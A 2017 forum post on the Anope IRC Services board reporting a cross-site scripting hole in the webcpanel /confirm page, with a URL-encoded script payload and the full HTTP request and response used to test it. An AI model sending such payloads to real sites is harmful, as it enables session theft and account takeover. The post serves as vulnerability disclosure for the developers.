Anope IRC Services

Please login or register.

Login with username, password and session length
Advanced search  

News:

Pages: [1]   Go Down

Author Topic: Webcpanel possible vulnerable to (XSS) attacks  (Read 781 times)

0 Members and 1 Guest are viewing this topic.

Nikos

  • Anope User
  • Offline Offline
  • Gender: Male
  • Posts: 2
  • Don't be a maybe...
    • HellenicNet
Webcpanel possible vulnerable to (XSS) attacks
« on: June 05, 2017, 01:14:03 PM »

Well,i got free time to deal with webcpanel and anope features again.I think no one would want to post vulns but i love anope so i will do it.
Websites that use SSL (https) are in no way more protected than websites that are not encrypted. The web applications work the same way as before. People often think that because they see the lock on their browser it means everything is secure. So this just isn't the case.

This vulnerability affects the /confirm page which doesn't filter metacharacters from the user input.
URL encoded POST input email: url%40email.com'"()&%<ScRiPt >prompt(1)</ScRiPt>

<<<REQUEST>>> #Network is hidden
POST /confirm HTTP/1.1
Content-Length: 116
Content-Type: application/x-www-form-urlencoded
Referer: https://anope.***.org/
Host: anope.***.org
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

email=url%2540email.com'%22()%26%25<ScRiPt%20>prompt(1)</ScRiPt>&password=thisIs%24%24UrL&username=nikos

<<<RESPONSE>>>
HTTP/1.1 200 OK
Server: nginx/1.12.0
Date: Mon, 05 Jun 2017 11:32:50 GMT
Content-Type: text/html
Content-Length: 1642
Connection: keep-alive
Strict-Transport-Security: max-age=15768000; includeSubDomains
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Permitted-Cross-Domain-Policies: none


Please verify.

Logged
Pages: [1]   Go Up